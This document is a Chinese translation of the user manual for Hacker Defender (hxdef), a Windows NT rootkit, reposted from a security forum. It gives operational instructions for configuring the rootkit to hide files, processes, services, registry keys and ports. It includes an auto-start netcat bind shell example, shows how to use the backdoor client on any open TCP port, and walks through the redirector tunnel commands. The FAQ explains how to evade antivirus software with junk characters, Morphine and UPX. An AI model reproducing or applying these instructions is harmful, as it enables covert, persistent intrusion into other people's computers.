文章译者:ZiQi [E.S.T]
信息来源:邪恶八进制安全小组(www.eviloctal.com)
才疏学浅,不便之处,还请多多包涵。
=============[Hacker defender -中文使用说明]================
NT Rootkit
----------
作者: Holy_Father <
[email protected]>
Ratter/29A <
[email protected]>
版本: 1.0.0
开发日期: 01.01.2004
网站: http://rootkit.host.sk, http://hxdef.czweb.org
开发群: ch0pper <
[email protected]>
aT4r <
[email protected]>
phj34r <
[email protected]>
unixdied <
[email protected]>
rebrinak
GuYoMe
ierdna <
[email protected]>
Afakasf <
[email protected]>
说明: Czech & English by holy_father
French by GuYoMe
Chinese by Ziqi
=====[1,目录]==============================================
1. 目录
2. 概要
2.1 关于
2.2 申明
3. 使用说明
4. Ini文件说明
5. Backdoor
5.1 Redirector
6. 技术支持
6.1 版本
6.2 钩子API函数
6.3 已知的 bugs
7. Faq
8. 文件
=====[ 2. 关于]================================================
Hacker defender (hxdef)是一个使用于Windows NT 4.0, Windows 2000 以及Windows XP操作系统的一个NTROOKIT,它也能运行于之后的基于NT的操作系统。主要代码是由DELPHI 6完成。新的功能使用汇编书写。驱动代码由C完成。后门和redirector客服端大部分使用 Delphi 6完成。
=====[ 2.1 概要 ]=============================================
程序的主要功能是在所有运行中的进程中重写分割内存,重写一些基本的模块改变进程的状态,它几乎能够改写所有不影响系统稳定和正在运行中的进程。
程序能够完全隐藏,现在能够做的有隐藏文件、进程、系统服务、系统驱动、注册表的键值和键、开放端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动,并且隐蔽地控制被隐藏进程。程序安装后能构造后门、注册表、系统服务,构造系统驱动。其本身的后门技术允许其植入 redirector。
=====[ 2.2 申明]====================================================
本项目1.0.0版本是开发源代码。
使用Hacker defender所造成的后果作者本人概不负责。
=====[ 3. 用法 ]==================================================
一个使用hxdef的简单例子:
>hxdef100.exe [inifile]
或者
>hxdef100.exe [switch]
直接执行EXE文件,不带任何的参数时候,默认的inifile文件为程序名.ini 。
当你执行hedef100不指定ini文件,或者你以参数模式运行时候,默认的文件是
hxdef100.ini。
下面的参数是有效的:
-:installonly - 只安装服务,不运行
-:refresh - 从INI文件中更新设置
-:noservice - 正常运行不安装服务
-:uninstall - 移除hxdef删除所有运行的后门连接,同时停止hxdef服务
例如:
>hxdef100.exe -:refresh
Hxdef拥有默认INI文件,但是我们强烈的推荐你建立自己的ini文件。关于ini文件的介绍可以看第4部分ini文件部分。
参数 -:refresh and -:uninstall 来源于本来的EXE文件。这就意味这你只要知道hxdef的运行路径和EXE名,就能够改变它的设置或者进行移除工作。
=====[ 4. Ini文件 ]============================================
ini文件必须包含了9个部分: [Hidden Table], [Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], [Free Space], [Hidden Ports]和[Settings]。
在 [Hidden Table], [Root Processes], [Hidden Services]和[Hidden RegValues] 中能够使用*代替后面的字符,星号仅仅使用于字符的后面,任何在*之前的都是无效的。所有的在字符之前和之后的空格也是无效的。
例如:
[Hidden Table]
hxdef*
将开始隐藏所有在Hidden Table中以"hxdef"开头的文件、文件夹和系统进程。
在该文件列表中的所有文件和文件夹都将在文件管理器中消失。在这个列表中的程序也会在任务管理器中被隐藏。必须确保主要文件,INI文件,你的后门文件和驱动文件被包含在列表中。
在程序列表中的主进程对感染具有免淤能力,你只能利用这些主程序才能看见隐藏的文件,文件夹和程序。所以,主进程是为rootkit管理员所使用的。
由服务和驱动所组成的Hidden Services列表将会隐藏在数据库中的安装服务和驱动。rootkit主程序的服务名默认为HackerDefender100,rootkit驱动的驱动名默认为HackerDefenderDrv100。它们两者都可以通过ini文件进行修改。
Hidden RegKeys中列出的注册表键值将会被隐藏,Rootkit在注册表中有四个键值:默认的是HackerDefender100, LEGACY_HACKERDEFENDER100, HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100 如果你要重新命名服务名或者驱动名,你需要在列表中做相应的改变。
开始2个键值是和你的服务据用相同名字的,接下来的键值是LEGACY_名字。例如,如果你改变你的服务名称为BoomThisIsMySvc ,那么在注册表中,应该是这样表示的,LEGACY_BOOMTHISISMYSVC。
在Hidden RegValues列出的注册表的值将会被隐藏。
Startup Run列表中列出的是rootkit程序运行之后的自启动程序。这些程序和ROOTKIT具有一样的特权。程序名和它后面的参数以?分开。不要使用"字符,程序将会在用户登陆以后终止,在用户登陆以后可以使用一般和常见的方法。你可以使用下面这些快捷方式。
%cmd%标准系统的shell和路径
%cmddir%标准系统的shell文件夹
%sysdir% - 系统文件夹
(e.g. C:\winnt\system32\)
%windir% - 标准系统文件夹
(e.g. C:\winnt\)
%tmpdir% - 临时文件夹
(e.g. C:\winnt\temp\)
例如:
1)
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe
nc-shell将会在rootkit运行以后监听100端口
2)
[Startup Run]
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt
将rootkit启动时间保存在系统临时文件夹夹starttime。Txt文件。
(%TIME%仅仅运行于Windows2000以上的操作系统。)
Free Space中列出的驱动硬盘名和容量大小是你想增加的硬盘,它的格式是X:NUM,其中X表示磁盘驱动器的名称,NUM表示你要增加的磁盘的容量。
例如:
[Free Space]
C:123456789
这将在C盘增加大约123M的磁盘空间。
Hidden Ports中列出的是你需要隐藏程序的端口,比如使用OpPorts, FPort, Active Ports, Tcp View等的程序,它最多拥有2行。第1行的格式是TCP:tppport1,tcpport2,tcpport3 ,第2行的格式是UDP:udpport1,udpport2,udpport3 ...
例如:
1)
[Hidden Ports]
TCP:8080,456
这将隐藏2个TCP端口:8080和456
2)
[Hidden Ports]
TCP:8001
UDP:12345
这将隐藏2个端口:TCP的8001和UDP的12345。
3)
[Hidden Ports]
TCP:
UDP:53,54,55,56,800
隐藏5个端口,都为UDP端口:53,54,55,56,800。
Settings包含了8个值:Password, BackdoorShell, FileMappingName, ServiceName,ServiceDisplayName, ServiceDescription, DriverName 和 DriverFileName。
名。
16位字符的Password被用于后门链接和转向,密码能根据短一些,余下的用空格代替。
BackdoorShell是复制于系统的SHELL文件,它被后门创建于一个临时的目录下。
FileMappingName,当钩子进程被存储时,用于共享内存。
ServiceName是rootkit服务
ServiceDisplayName为rootkit显示的服务
ServiceDescription位rootkit的服务描述
DriverName以hxdef驱动命名
DriverFileName以hxdef驱动文件命名
例如;
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdef?.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
这就意味着你的后门密码为hxdef-rulez,后门将复制系统shell文件(通常是CMD.EXE)为hxdef?.exe到临时目录。共享内存将变为"_.-=[Hacker Defender]=-._",服务名为"HackerDefender100",它显示的名称为"HXD Service 100",它的描述为"poweful NT rootkit",驱动名为"HackerDefenderDrv100",驱动将被存储于一个叫做"hxdefdrv.sys"的文件中。
扩展字符|, <, >, :, \, / 和 "在所有的行中都会被忽略,除了[Startup Run], [Free Space] 和 [Hidden Ports] 项目和在 [Settings] 中first = character后面的值。使用扩展字符能然你的INIFILE文件摆脱杀毒软件的查杀。
例如:
Example:
[H<<<idden T>>a/"ble]
>h"xdef"*
和下面的是一样的。
[Hidden Table]
hxdef*
更多的例如可以参照hxdef100.ini 和hxdef100.2.ini文件。
所有的在ini文件中的字符串除了那些在Settings 和 Startup Run中的,都是无效的。
=====[ 5. Backdoor ]=========================================
Rootkit程序 Hook了一些API的功能,连接接收一些来自网络的数据包。如果接收的数据等于256个字节,密码和服务被确认,复制的SHELL被临时创建,这种情况建立以后,下一次的数据接收被重定向到这个SHELL上。
因为rootkit程序 Hook了系统中所有进程,所有在服务器上的TCP端口都将变为后门。例如,如果目标主机开放了提供HTTP服务的80端口,这个端口也能作为一个有效的后门。例外的是这个开放端口的进程不会被Hook,这个后门仅仅工作于服务器的接收缓冲大于或者等于256个字节。但是这个特征几乎适合于所有标准的服务,像IIS,APACHE,ORACLE等。后门能够隐藏是因为所有的数据都通过系统上面提供的服务转发。所以你不能使用一些简单的端口扫描软件找到它,并且它能轻易的穿过防火墙。
在测试发现IIS服务过程中,HTTP服务不能记录任何的连接日记,FTP和SMTP服务器仅仅能记录结束的断开连接。所以,如果你运行hxdef在有IIS Web服务的服务器上面,HTTP端口跟你是连接机器使用的后门的最好端口。
如果你想连接后门的话,你将不得不使用使用一些特别的客户端,程序bdcli100.exe就是被用于如此的。
用法:bdcli100.exe host port password
例如:
>bdcli100.exe www.windowsserver.com 80 hxdef-rulez
连接服务器www.windowsserver.com使用默认的密码。客户端1.0.0版本不兼容其他老的版本。
=====[ 5.1 Redirector ]==========================================
Redirector是基于后门技术。第一个连接包和后门连接一样。这就意味着你能使用相同的端口。下一个包是仅仅为Redirector特殊的包,这些包由基于运行用户电脑的重定向器生成.第一个重定向的包连接特定的目标主机和端口。
Redirectors的设置保存在与EXE文件同名的INI文件中(所以默认的是rdrbs100.ini)。如果这个文件不存在,那么在EXE文件运行的时候它会自动建立一个。最好不要额外的修改INI文件。所有的设置都可以在console中进行改变。
当ROOTKIT被安装时,如果我们需要使用服务器上面的redirectors功能,我们首先要在本地运行程序。在控制台上我们可以在有HXDEF的服务器上面建立一个映射端口路由。最后我们连接本地端口并且转换数据。转向的数据被rootkit的密码加密。在这个版本中连接的速度被限制在256K左右。在这个版本中redirectors并不适合于高速连接。Redirectors也会受到安装有rootkit的服务器的限制,而且Redirectors仅仅使用TCP协议连接。在这个版本中Redirectors base有19条命令,他们并不是非常的敏感。关于功能的详细描述可以使用HELP命令。在Redirectors base启动时,startup-list中的命令也被执行。startup-list中的命令可以用使用SU启动的CMD进行编辑。
Redirector区分于2种连接类型(HTTP和其他)。如果连接是其他类型的,数据包将不会被改变。如果是HTTP类型,在HTTP文件头的HOST参数将会改变为目标服务器。一个base的最大Redirector数量是1000。
Redirector仅仅适用于NT结构,只有在拥有图标的NT程序下你才能使用HIDE命令隐藏控制台。只有在NT下才能无声无息的运行,没有数据输出,没有图标,仅仅执行startup-list中的命令。
例子:
1)得到端口映射信息
>MPINFO
No mapped ports in the list.
2)增加MPINFO命令到startup-list并且得到startup-list中的命令。
>SUADD MPINFO
>sulist
0) MPINFO
3)使用HELP命令。
>HELP
Type HELP COMMAND for command details.
Valid commands are:
HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD,
DEL,
DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
>HELP ADD
Create mapped port. You have to specify domain when using HTTP
type.
usage: ADD <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT>
<TARGET
SERVER> <TARGET SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]
>HELP EXIT
Kill this application. Use DIS flag to discard unsaved data.
usage: EXIT [DIS]
4)增加端口映射,我们在本地100端口进行监听,ROOTKIT安装在服务器200.100.2.36的80端口上,目标服务器是www.google.com80端口。,rootkit的密码是bIgpWd,连接类型HTTP,目标主机(www.google.com)我们知道它的IP地址是216.239.53.100。
>ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com
ADD命令可以不加任何参数的运行,在这个例子中我们要求每一个参数都要分开
。
5)现在我们再使用MPINFO检查一下映射端口
>MPINFO
There are 1 mapped ports in the list. Currently 0 of them
open.
6)列举端口映射表:
>LIST
000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP
7)一个端口映射的详细描述:
>DETAIL 0
Listening on port: 100
Mapping server address: 200.100.2.36
Mapping server port: 80
Target server address: 216.239.53.100
Target server port: 80
Password: bIgpWd
Port type: HTTP
Domain name for HTTP Host: www.google.com
Current state: CLOSED
8)在没有密码的情况下,我们能在端口映射服务器200.100.2.36上测试rootkit是否已经安装(但是如果我们能确认它这样做就不再需要)
>TEST 0
Testing 0) 200.100.2.36:80:bIgpWd – OK
如果测试失败则显示:
Testing 0) 200.100.2.36:80:bIgpWd - FAILED
9)在我们没使用之前端口仍然是没有开放的。我们不得不使用OPEN命令打开它,当端口开放时,我们也能使用CHOSE命令关闭端口。我们能使用标志符ALL应用这些命令在列表中的所有端口,这个过程可能需要一段的时间。
>OPEN 0
Port number 0 opened.
>CLOSE 0
Port number 0 closed.
或者
>OPEN ALL
Port number 0 opened.
10)要保存当前的设置和列表我们可以使用SAVE命令,将保存所有的设置到ini文件中。(保存也会通过命令EXIT执行,而不需要DIS标志)
>SAVE
Saved successfully.
打开的端口能够转换我们需要的所有数据。限制你能打开你喜欢的浏览器输入网址http://localhost:100/,如果没有什么问题的话,你会看见打开的是www.google.com的主页。
第一个数据包跟你会延迟5秒钟左右,但是其他的限制仅仅取决于服务器的速度,根据这个版本的转向技术,你联网的速度大约在256K左右。
=====[ 6. 技术发行]========================================
这部分包含了一些对于普通用户无关紧要的信息。这部分可能适合所有的测试者和开发人员阅读。
=====[ 6.1 版本 ]===========================================
=====[ 6.3 已知的BUGS]=====================================
在这个版本有一个已知的bugs。
1) 当你在控制台使用右键或者使用控制台菜单复制大量的数据到剪切板的时候,后面客户端可能会崩溃。如果程序在运行过程中如上所说,你仍然能使用Ctrl+Ins, Shift+Ins从剪切板中粘贴数据。
如果你发现了BUGS请报告给公共留言簿(如果你是测试人员请发送到测试人员留言簿)或者E-mail到
[email protected]。但是必须保证你已经阅读了使用说明FAQ部分,todo列表和留言簿,并且你在写之前还没有任何其他的相关资料。
=====[ 7. Faq ]===================================================
因为在留言簿上出现了大量的简单问题,使我意识到写这个FAQ部分在这个使用说明中。在你问任何问题之前请先阅读这个使用说明2次并且特别注意这个部分。然后查看留言簿中以前的帖子,如果你发现你还使不能找到解决的答案,请把你的问题发到留言簿中。
这些问题是
1) 我下载了hxdef,运行了但不能删除它,如果我不能看见它的进程、服务和文件,我怎么删除它?
A:如果你保留了最初的设置你可以在SHELL中停止服务:
>net stop HackerDefender100
hxdef将会停止服务完全的卸载。这和-:uninstall是一样的,但是你不需要知道hxdef在什么地方。如果你在ini文件设置中更改了服务名,在CMD下输入:
>net stop ServiceName
其中ServiceName 是你在ini文件进行设置的服务名。
如果你忘记了服务名,你可以使用系统启动光盘重新启动到DOS环境,找出hxdef的ini文件,打开并找出它的服务名。
2) 一些人黑客我的机器,运行了hxdef我不能删除它。我怎么才能卸载它和所有安装在我电脑上的后门程序?
A:唯一能做的就是重新安装你的操作系统。但是如果你能和上面的情况一样找出ini文件,根据ini文件卸载hxdef找出所有在Hidden Table中列出的文件,确认这些文件并且完全删除它们。
3) 这个程序能被杀毒软件查杀吗?如果是,怎么才能让它不被查杀?
A:是的,不仅仅exe文件会被查杀,一些杀毒软件甚至能查杀ini文件和驱动文件。第二个问题的答案就是,你能很轻松的躲避查杀。在hxdef主页你可以发现一个工具叫做Morphine,如果你在hxdef的exe文件上使用了Morphine,你会得到一个新的exe文件,这个文件不会被普通的杀毒软件查杀。Ini文件也能设计为躲避杀毒软件,你可以增加一些扩展字符以抵抗杀毒系统。详细的可以看4.ini文件部分。也可以看包含的ini文件,这2个样本是一样的,但是第一个使用了扩展字符让它能够躲过杀毒软件。也许在使用Morphine之前最好的方法是使用UPX,UPX将会减少hedef的exe文件大小,Morphine将会遮蔽杀毒软件,关于更多的可以看Morphine的使用说明。
4) 当服务器开放135/TCP, 137/TCP, 138/TCP, 139/TCP or 445/TCP端口的时候,为什么我不能通过这些端口连接我的后门?
A:这个问题在第五部分,后门章节被提及到。后门需要服务器接收缓冲大于或者等于256个字节,统一,系统的端口可能不工作。如果你遇到了这样的问题,你可以简单的使用NC监听一个你自己的端口,你需要增加这个NC端口到ini文件的Hidden Ports。
5) 当文件在磁盘上是可见的时候,还有什么办法隐藏进程吗?
A:不能,你也不能隐藏在磁盘上文件的进程,当它在认为管理器中是可见的时候
。
6) 怎么样隐藏svchost.exe和其他我能够在任务管理器上看见的进程?
A:这真的是一个坏的注意,如果你隐藏了系统必需的进程,你的WINDOWS将会马上崩溃。拥有hxdef你不需要命名你那些恶毒的问题为svchost.exe, lsass.exe等。你可以将它命名为任何名字然后在Hidden Table隐藏它。
7) 当我使用DameWare时我能看见所有本应该被隐藏的服务和其他,这是一个bug吗?
A:不是。DameWare或者其他个人使用的远程sessions (或者 netbios)能够看见服务,是因为这个功能还没有实现。它是介于bug和未开发的一个大问题。看网站TODO列表,这些功能还未开发。
8) 但是所有经过netbios的人都能看见我隐藏的文件,我该怎么做?
A:把你的文件深深的放在系统文件夹里面或者不要共享文件夹。
9) 后门客户端不工作。每次看上去好像是OK的,但是连接上以后我不能输入任何东西,整个控制台也是黑色的。我该怎么做?
A:你可能使用了一个错误的端口连接。Hxdef能自动的检测错误的端口并且中断你的连接,但是有时候也许不能检测到你使用错误的端口。所以,请使用一个不同的端口。
10) 什么时候我们能得到新的版本?
A:开发者都是在业余时间开发代码。他们没有从这个上面得到任何的钱而且也不会从这个上面得到钱。现在只有2位代码开发者我们认为这已经足够了。这就意味这我们不会象微软那样快的发布程序,你最好的是等,不要问我们什么时候将会公布新的版本。不像微软,我们的产品都是免费的并且拥有良好的测试人员,我们测试这个程序很多次,所以发布的都是非常的稳定的。
11) Net.exe命令不能停止隐藏的服务,这是一个bug吗?
A:不是,这不是一个bug,而是它的特征。如果你隐藏了它,只有rootkit的管理员在知道服务名的情况下才能停止它。所以不要恐惧这种方式能发现你。
12) 有什么方法找到rootkit吗?
A:是的。有很多种方式能找出所有的rootkit,这个也不例外。任何的rootkit都能被检测。唯一的问题是在于它的难度和别人用它来做什么。
13) 既然找出hxdef很难,有人能写出一个程序吗?
A:很容易就能发现它,但是我不知道有什么特别的软件能马上告诉你你的机器上面安装有hxdef。
14) 我怎么样才能找出它?
A:我不会告诉你的。呵呵!
15) 版本的数量从0开始是否意味这它没有固定的版本?
A:不。它表示一些小的未开发的东西将会在下次开发被完善。
16) 你什么时候公布源代码?我想阅读1.0.0版本的代码,什么时候公布呢?
A:我真的不知道。在发布1.0.0版本以后有很多的事情需要我去开发。它可能需要6个月或者更长的时间。
17) 我想成为一个测试人员,我该怎么做?
A:你可以写信告诉我你该怎么做,告诉我你作为一个测试人员的工作能力和经验。但是成为一个新的测试人员的机会是相当小的。现在我们有足够的测试人员他们都做得很好,不需要增加人员。
18) 使用hxdef符合法律吗?
A:当然是。但是hxdef经常被用于非法行为。
19) 能否将老的hxdef升级到限制的版本?有办法不需要重新启动机器吗?
A:不可能不需要重启你的电脑,但是你可以手工卸载老的版本进行升级,重启你的电脑进行安装新的版本。
20) 这个版本的hxdef能否升级为以后的新版本?不需要重启电脑可以吗?
A:是的,你可以使用-:uninstall完全移除hxdef的这个版本不需要重启电脑,在安装新的版本。
21) 使用-:uninstall好,还是使用net stop ServiceName好?
A:最好的方式是使用-:uninstall进行卸载,如果有可能的话,不过使用net stop也能得到一样的效果。
22) 我真的很喜欢这个程序,我可以支持你的工作并给你一点捐助吗?
A:我们不需要。但是我们希望你能把钱捐献给你的国家的任何慈善机构,写份MAIL告诉我们关于这件事情。
23) 在哪里可以干部隐藏C:\temp而不是隐藏C:\winnt\temp?
A:不能。创建你自己的文件夹并把名字放在Hidden Table下面。
24) 我在ini文件中找到的密码是明文的,是这样的吗?
A:你可能认为这是一个非常不安全的方法存储密码,但是如果你隐藏你的ini文件没有能够找到,这就是安全的。这个很容易在任何时间进行改变,你可以使用-:refresh非常轻松的改变你的密码。
25) 如果我在Hidden Table 隐藏一个监听于某一端口的进程,这个端口也会自动隐藏吗?还是需要在Hidden Ports设置?
A:只有在Hidden Ports列表种的端口才能被隐藏。所以,请把它的端口放在Hidden Ports中。
=====[ 8. 文件 ]===================================================
defender v1.0.0包含下列的原是档案文件:
hxdef100.exe 70 144 b - Hacker defender v1.0.0程序
hxdef100.ini 3 872 b -默认的ini设置文件
hxdef100.2.ini 3 695 b -默认的ini设置文件, 第2类
bdcli100.exe 26 624 b - 后门客户端
rdrbs100.exe 49 152 b - redirectors base
readmecz.txt 34 654 b - 捷克语版说明文件
readmeen.txt 35 956 b - 英语说明文件
readmefr.txt 38 029 b - 法语说明文件
src.zip 91 936 b - 源代码
readmezh.txt 38 029 b - 中文说明文件
=====[END]====================================================
写在后面的话:
又工作了,好像每次工作都和网络扯不上什么关系,于是就慢慢的被网络忘记抛弃。N久之后(往往是辞职以后),重新回到网络,发现网络已经不是最开始的
那个情景了,加上本人生性愚笨懒惰,于是技术便慢慢的不由控制的一落千丈。翻译这编文章也是一个偶尔的机会,早知道yyt_hac有一个ntrookit,却不知道还有一个更加厉害的rootkit,也就是黑客守卫者。关于这个工具,我也没用过,翻译起来也都是纸上谈兵而已。很多的专业术语不清楚,可以比较自信一点的
就是,对于像我们这样的鸟,看得懂并能做一些简单的使用是没有问题的了。这个工具功能很强大,当然配置起来也是比较复杂,作者不推荐新手使用,不过偶尔玩玩也不错。
需要注意的是,用作者的话说,一旦被安装上又不懂得如何卸载的话,唯一能做的就是重新安装系统。
本文地址:http://com.8s8s.com/it/it21998.htm